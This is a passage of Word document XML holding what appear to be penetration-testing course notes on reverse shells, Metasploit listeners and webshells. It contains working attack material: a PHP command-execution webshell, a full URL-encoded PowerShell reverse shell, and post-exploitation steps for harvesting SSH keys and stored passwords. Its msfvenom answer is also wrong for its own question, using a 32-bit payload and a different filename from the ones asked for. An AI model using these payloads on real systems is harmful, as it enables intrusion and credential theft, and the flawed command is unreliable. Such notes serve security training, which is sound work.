    <w:p w14:paraId="000EF7DD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594799CC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit brand of fully-featured shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE41003" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>completely stable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A470F98" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>go for windows targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632DFF27" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>must be caught in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A25933" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>banned from certain certification examinations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44F828" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Payload Naming Conventions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F0EF78" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;OS&gt;/&lt;arch&gt;/&lt;payload&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1FBFBC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>stageless payloads are denoted with underscores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0B73C6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>staged payloads are denoted by forward slahes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E656307" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6294ACD4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf -o shell.elf LHOST=10.10.10.5 LPORT=443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB71E13" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Metasploit multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1809AFAC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>catching reverse shells, essential for meterpreter and go-to for staged payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A51B32" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="47113278" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9EF3F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC32EE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>set payload, LHOST, LPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6AB5CB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>exploit -j to start listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACD04B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Webshells</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263A9D66" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>webshells when reverse or bind shells are not an option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B51F75" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>runs inside a webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C849756" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>usually PHP or ASP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AE6AD3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>common scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F44FD6A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;?php echo "&lt;pre&gt;" . shell_exec($_GET["cmd"]) . "&lt;/pre&gt;"; ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BAA067" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>takes GET parameter in the URL and execute it on the system with shell_exec()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A86189" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>any commands entered in URL after ?cmd= will be executed on the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2C7F8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>GET parameter “cmd” with command “ifconfig” for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE5108" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>PentestMonkey php-reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6774E0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>most generic, language specific shells are written for Unix based, will not work on Windows by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB8E76" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>for windows, obtain RCE using a webshell or msfvenom to generate a reverse/bind shell in the language of the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139543F3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>obtaining RCE is often done with a URL Encoded Powershell Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605C7726" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>cmd=powershell%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27&lt;IP&gt;%27%2C&lt;PORT&gt;%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5653DDA5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>same as shell above but URL encoded to use in GET parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6AF1E8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>need to change IP and Port before use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF51DC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Next Steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63843312" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>look for opportunities to gain access to a user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A824AF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>SSH keys stored in /home/&lt;user&gt;/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A94440A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>add own account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7502EDC6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Dirty C0w or writeable /etc/shadow or /etc/passwd to give ssh access (if open)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68C356" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A7E34" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>find passwords for running services in registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55686110" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>VNC servers leave passwords in registry stored in plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20608A4A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>FileZilla FTP server in C:\Program Files\FileZilla Server\FileZilla Server.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A60CCE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> or C:\xampp\FileZilla Server\FileZilla Server.xml</w:t>
      </w:r>
    </w:p>
